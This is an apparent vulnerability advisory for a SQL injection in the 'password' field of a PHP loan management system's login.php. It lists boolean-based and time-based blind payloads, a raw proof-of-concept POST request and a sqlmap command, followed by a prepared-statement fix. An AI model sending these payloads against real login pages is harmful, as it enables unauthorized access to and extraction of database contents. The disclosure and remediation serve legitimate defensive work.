charonwang has discovered that Loan Management System OOP in PHP with MySQLi/jQuery Free Source Code V1.0 is affected by a serious security vulnerability caused by insufficient protection of the "password" parameter in the "login.php" file. This vulnerability may be used to inject malicious SQL queries, resulting in unauthorized access and extraction of sensitive information from the database.
Vulnerability Details
Loan Management System OOP in PHP with MySQLi/jQuery Free Source Code V1.0
Vulnerable File: login.php
Parameter Names: password
Attack Type: Remote
Description
---
Parameter: password (POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
Payload: username=admin&password=admin111' OR NOT 5946=5946#&login=
Vector: OR NOT [INFERENCE]#
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: username=admin&password=admin111' AND (SELECT 2451 FROM (SELECT(SLEEP(5)))FOOe)-- lCKh&login=
Vector: AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])
---
Burp Suite (POC):
POST /login.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:124.0) Gecko/20100101 Firefox/124.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 94
Connection: close
Cookie: PHPSESSID=mnhh06uo91qagrf4fhvggc6lo4
Upgrade-Insecure-Requests: 1

username=admin&password=admin111' AND (SELECT 2451 FROM (SELECT(SLEEP(10)))FOOe)-- lCKh&login=
Loan Management System OOP in PHP with MySQLi/jQuery Free Source Code V1.0 login.php - SQL injection vulnerability
Vendor Homepage
Software Link
Overview
Proof of Concept (PoC):
sqlmap -u "http://www.lms.com:8105/login.php" --dbms=mysql -v 3 -p 'password' --data="username=admin&password=admin111&login=" --method='POST'
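One way to close this injection point, shown as an added example that is not the project's own code (the page does not include the source of login.php). It assumes a hypothetical `users` table with `id`, `username` and `password_hash` columns, hashes created with `password_hash()`, and the helper names `post_string` and `authenticate`:

```php
<?php
declare(strict_types=1);

// Added example, not the project's code. Hypothetical schema:
// table `users` with columns `id`, `username`, `password_hash`.

// Make mysqli throw mysqli_sql_exception instead of failing silently.
mysqli_report(MYSQLI_REPORT_ERROR | MYSQLI_REPORT_STRICT);

// Accept only scalar string form fields; arrays such as password[]=x become ''.
function post_string(array $post, string $key): string
{
    return (isset($post[$key]) && is_string($post[$key])) ? $post[$key] : '';
}

/**
 * Returns the user id on success, null on any failure.
 * The submitted password never becomes part of the SQL text, so quotes,
 * `#` / `-- ` comments and SLEEP() sub-selects in it stay inert data.
 */
function authenticate(mysqli $conn, string $username, string $password): ?int
{
    // The ? placeholder keeps the username out of the SQL grammar as well.
    $stmt = $conn->prepare(
        'SELECT id, password_hash FROM users WHERE username = ? LIMIT 1'
    );
    $stmt->bind_param('s', $username);
    $stmt->execute();
    $stmt->bind_result($id, $hash);
    $found = $stmt->fetch();   // true = row fetched, null = no matching row
    $stmt->close();

    if ($found !== true) {
        return null;
    }
    // The comparison happens in PHP against the stored hash, not in MySQL.
    return password_verify($password, (string) $hash) ? (int) $id : null;
}

// Usage in a login handler (connection values are placeholders):
// $conn = new mysqli('localhost', 'db_user', 'db_pass', 'db_name');
// $uid  = authenticate($conn, post_string($_POST, 'username'),
//                      post_string($_POST, 'password'));
// if ($uid === null) { http_response_code(401); exit('Invalid credentials'); }
// session_regenerate_id(true);
// $_SESSION['user_id'] = $uid;
```

With this structure, both sqlmap vectors listed above reach the server only as a bound value or as input to `password_verify()`, so neither the boolean condition nor the `SLEEP()` call is ever parsed as SQL.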